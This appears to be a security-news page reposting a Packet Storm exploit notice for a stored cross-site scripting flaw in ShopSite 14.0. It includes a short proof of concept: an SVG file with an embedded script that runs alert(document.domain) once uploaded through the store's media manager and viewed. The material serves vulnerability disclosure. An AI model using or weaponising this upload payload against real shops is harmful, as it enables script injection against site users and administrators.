Security
Headlines
HeadlinesLatestCVEs

Headline

ShopSite 14.0 Cross Site Scripting

ShopSite version 14.0 suffers from a persistent cross site scripting vulnerability.

Packet Storm
#xss#vulnerability#web#auth
# Exploit Title: ShopSite Version: 14.0 - Stored XSS# Date: 2023-12-25# Exploit Author: tmrswrr# Category : Webapps# Vendor Homepage: https://www.shopsite.com/# Version: 14.0# Tested on: https://www.shopsite.com/demo.html1 ) Upload poc.svg file here : https://demo.shopsite.com/cgi-bin/ssdemos/stores/alsdemo/ss/mediam.cgipoc.svg<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 500 500">    <script>//<![CDATA[        alert(document.domain)    //]]>    </script></svg>2 ) Check here will be see alert button : https://a-demo-store.com/ssdemos/stores/alsdemo3/media/ss_sunglasses/aaa.svg

Packet Storm: Latest News

Ubuntu Security Notice USN-7121-3